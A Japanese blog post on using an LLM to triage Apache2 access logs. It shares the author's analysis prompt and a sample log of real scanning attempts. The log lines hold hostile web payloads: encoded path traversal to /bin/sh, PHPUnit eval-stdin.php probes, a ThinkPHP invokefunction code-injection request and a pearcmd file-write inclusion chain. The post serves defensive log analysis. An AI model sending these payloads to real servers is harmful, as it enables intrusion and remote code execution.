前に同じことを書いたんですけど(このブログ)の続編
このブログを書いてからその後、2024.09.20にちょこっとだけ補足してます(青字部分)
これまでの使用感ですけど、ちょっと違うんじゃない😅という出力もあったりはするんですけど、解析のきっかけとなって勉強になるし、ログの解析作業の省力化にはなるかなと、当然LLMモデルにはカットオフ日があるわけで、それより未来の情報は教えてくれないですしね、ということで、まだまだ人の最終チェックが必要なレベルで、ちょっとトーンダウン⤵️してます😅、使えることは使えると思います。今後、非検閲(Uncensored)のLLMモデルをローカル化した環境を持っているので、RAGや外部参照などで補足する方法も検討したいと思っています。(ローカルLLMを構築した「ブログはここ」を参照してください。)
最新のプロンプト
「apache2のログを解析してください。解析した結果が攻撃であれば、その攻撃が成功しているか、失敗しているかを、また、攻撃の結果が成功したか失敗したかによらず、その攻撃に関連するCVEやCVSSスコア、EPSSスコアを教えてください。ログは以下になります。説明は、同じ内容のものはまとめて、そうで無いものは1行ずつお願いします。」
調査したログのサンプル
結果はうまく貼り付けることがきない😂ので、表示しませんが、調査したサンプルのログ(若干加工してます でもこのログというか攻撃本当に多い)を貼り付けます。試してみてください。(内容は横スクロールします。)
"POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 3865 "-" "Custom-AsyncHttpClient"
"POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 3865 "-" "Custom-AsyncHttpClient"
"GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 4420 "-" "Custom-AsyncHttpClient"
"GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 1066 "-" "Custom-AsyncHttpClient"
"GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1066 "-" "Custom-AsyncHttpClient"
"GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 1066 "-" "Custom-AsyncHttpClient"
"GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 1066 "-" "Custom-AsyncHttpClient"
"GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1066"-" "Custom-AsyncHttpClient"
"GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1066 "-" "Custom-AsyncHttpClient"
"GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 1066 "-" "Custom-AsyncHttpClient"
"GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1066 "-" "Custom-AsyncHttpClient"
"GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 1066 "-" "Custom-AsyncHttpClient"
"GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1066 "-" "Custom-AsyncHttpClient"
"GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 1066 "-" "Custom-AsyncHttpClient"
"GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1066 "-" "Custom-AsyncHttpClient"
"GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 1066 "-" "Custom-AsyncHttpClient"
"GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1066 "-" "Custom-AsyncHttpClient"
"GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1066"-" "Custom-AsyncHttpClient"
"GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1066 "-" "Custom-AsyncHttpClient"
"GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1066 "-" "Custom-AsyncHttpClient"
"GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1066 "-" "Custom-AsyncHttpClient"
"GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1066 "-" "Custom-AsyncHttpClient"
"GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1066"-" "Custom-AsyncHttpClient"
"GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1066 "-" "Custom-AsyncHttpClient"
"GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1066 "-" "Custom-AsyncHttpClient"
"GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1066 "-" "Custom-AsyncHttpClient"
"GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1066"-" "Custom-AsyncHttpClient"
"GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1066 "-" "Custom-AsyncHttpClient"
"GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1066"-" "Custom-AsyncHttpClient"
"GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1066 "-" "Custom-AsyncHttpClient"
"GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1066 "-" "Custom-AsyncHttpClient"
"GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1066"-" "Custom-AsyncHttpClient"
"GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1066"-" "Custom-AsyncHttpClient"
"GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1066 "-" "Custom-AsyncHttpClient"
"GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1066 "-" "Custom-AsyncHttpClient"
"GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1066"-" "Custom-AsyncHttpClient"
"GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1066"-" "Custom-AsyncHttpClient"
"GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1066 "-" "Custom-AsyncHttpClient"
"GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1066 "-" "Custom-AsyncHttpClient"
"GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 1066 "-" "Custom-AsyncHttpClient"
"GET /public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 1066 "-" "Custom-AsyncHttpClient"
"GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\"hi\"));?>+/tmp/index1.php HTTP/1.1" 404 1066 "-" "Custom-AsyncHttpClient"
"GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 404 1066 "-" "Custom-AsyncHttpClient"